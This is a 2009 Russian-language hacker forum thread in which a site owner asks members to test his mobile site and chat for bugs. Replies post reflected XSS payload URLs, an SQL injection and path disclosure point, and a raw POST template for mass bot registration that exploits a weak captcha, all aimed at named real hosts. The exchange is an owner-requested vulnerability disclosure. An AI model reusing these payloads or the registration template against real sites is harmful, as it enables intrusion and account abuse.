PDA

Просмотр полной версии : Проверте на баги

NAGAN
11.01.2009, 12:28
проверти на баги сайт для мобильных телефонов версии xhtml http://wapnn.org и чат http://chat.wapnn.org
NAGAN
11.01.2009, 21:44
хм...хоть напишите что кавряли он ничего не на кавыряли а то сидиш как ботиног и ждеш! :(
mr.The
11.01.2009, 22:29
Powered by JohnCMS
2. Сайт, заявку на рассмотрение которого вы оставляете должен содержать некую самописную часть.
кагбы б..
NAGAN
11.01.2009, 22:51
вот по этому я и попросил проверить! а то что в ШАПКЕ скрипта написано так это остатки от движка! код Двига переделанный полностью! +чат написаный практически с 0! вроде все в рамках положенного!
BlackSun
12.01.2009, 07:02
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355
-------------
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1'
------------
XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал
NAGAN
12.01.2009, 10:27
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
BlackSun
12.01.2009, 11:56
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
Ты пройди по ссылке, сохрани "картинку" и открой блонкнотом
TR0J@N
13.01.2009, 00:21
Регим армию пользователей)
Ну капча слишком простая, можно либо распознавать, и привязка сессия=КОД_КАПЧИ сохраняется!

POST http://wapnn.org/registration.php HTTP/1.0
Accept: */*
Referer: http://wapnn.org/registration.php
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: wapnn.org
Content-Length: 163
Pragma: no-cache
Cookie: SESID=ССЕСИЯ

nick=ЛОГИН&password=ПАСС&imname=ИМЯwd&sex=m&about=тратата&kod=КОД_КАПЧИ&submit=Регистрация
Xcontrol212
13.01.2009, 02:28
XSS
http://chat.wapnn.org/enter.php?ver="><ScRiPt%20%0a%0d>alert(/XSS/);</ScRiPt>&ref=318409
NAGAN
13.01.2009, 21:12
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355

XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал


хыхых прикол это раскрытие путей и inj на другой сайт! это через граберы! :) тема вообще!
NAGAN
13.01.2009, 21:13
Регим армию пользователей)
Ну капча слишком простая, можно либо распознавать, и привязка сессия=КОД_КАПЧИ сохраняется!

POST http://wapnn.org/registration.php HTTP/1.0
Accept: */*
Referer: http://wapnn.org/registration.php
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: wapnn.org
Content-Length: 163
Pragma: no-cache
Cookie: SESID=ССЕСИЯ






nick=ЛОГИН&password=ПАСС&imname=ИМЯwd&sex=m&about=тратата&kod=КОД_КАПЧИ&submit=Регистрация



спасибо исправлю в ближайшее время